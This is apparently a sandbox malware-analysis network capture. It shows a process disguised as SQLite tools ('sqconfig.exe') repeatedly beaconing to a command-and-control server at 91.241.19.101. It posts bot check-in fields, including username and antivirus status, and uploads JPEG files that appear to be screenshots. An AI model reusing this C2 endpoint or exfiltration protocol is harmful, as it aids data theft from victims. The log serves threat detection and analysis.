                                                                  Sep 30, 2021 23:54:06.549325943 CEST20346OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:06.549793005 CEST20364OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:06.549856901 CEST20369OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:06.674046993 CEST20375OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:06.674333096 CEST20377OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:54:06.674396038 CEST20383OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:54:06.674487114 CEST20385OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:54:06.893222094 CEST20418INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  221192.168.2.35005791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:06.552484989 CEST20369OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:06.769747972 CEST20417INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  222192.168.2.35005891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:07.010987997 CEST20418OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:07.226717949 CEST20419INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  223192.168.2.35005991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:07.230670929 CEST20419OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:07.230911016 CEST20420OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:07.231245041 CEST20430OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:07.231518984 CEST20432OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:07.371675014 CEST20435OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:07.372267962 CEST20441OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:07.372350931 CEST20443OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:07.372426033 CEST20453OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:54:07.372628927 CEST20455OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:07.372829914 CEST20458OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:54:07.507570028 CEST20464OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:07.721932888 CEST20507INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  224192.168.2.35006091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:07.469985008 CEST20459OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:07.663197041 CEST20507INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  225192.168.2.35006191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:07.892133951 CEST20508OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:08.085819006 CEST20508INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:08.210690975 CEST20509OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:08.210994005 CEST20509OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:08.211390972 CEST20519OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:08.211615086 CEST20522OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:08.336266041 CEST20525OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:08.336353064 CEST20530OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:08.336463928 CEST20533OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:08.336586952 CEST20548OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:54:08.459825039 CEST20557OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:08.460196972 CEST20565OUTData Raw: dc 1f 4a ee bc 69 f1 06 d3 c6 3e 05 b4 b6 78 cd be a9 0d ea 3c b0 80 4a b2 84 70 59 4f a6 48 e0 f2 33 df ad 78 79 86 02 a5 6a ea 4b 67 a7 a1 df 86 c4 46 9d 36 9e e8 f6 d8 bb 55 b8 eb e3 f1 4b 59 2c 83 fe 9e 7e 1f f0 4b 79 8f f7 7f 1f f8 01 4b 8a
                                                                  Data Ascii: Ji>x<JpYOH3xyjKgF6UKY,~KyKJQ_FyaKICGBA5W4OGl?enq9%(xjIoyr^n=1"A"|bO,6>qbXTrODKe[JmKs^k=
                                                                  Sep 30, 2021 23:54:08.460254908 CEST20583OUTData Raw: 56 f6 23 fc 28 fc 2a da 69 b7 4f f7 60 90 fe 15 6e 2f 0f ea 12 1f f5 04 0f 7a ce 55 e9 ad d9 71 a1 52 5b 45 99 23 34 ec 56 fa 78 5a f0 fd f6 8d 07 b9 a9 47 86 a1 8f 99 af e1 5f c6 b1 78 ca 5d cd 56 0a b3 e9 63 9c e3 d2 8c 7a 57 4b fd 99 a1 c1 fe
                                                                  Data Ascii: V#(*iO`n/zUqR[E#4VxZG_x]VczWKP*~-RKsI21NBqiO:|KVV}tze*=Ya}&n,K#ZQBi16Zz#>N:${9R
                                                                  Sep 30, 2021 23:54:08.669223070 CEST20596INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  226192.168.2.35006291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:08.428857088 CEST20549OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:08.631866932 CEST20596INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  227192.168.2.35006391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:08.882976055 CEST20597OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:09.067532063 CEST20611INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  228192.168.2.35006491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:09.044715881 CEST20597OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
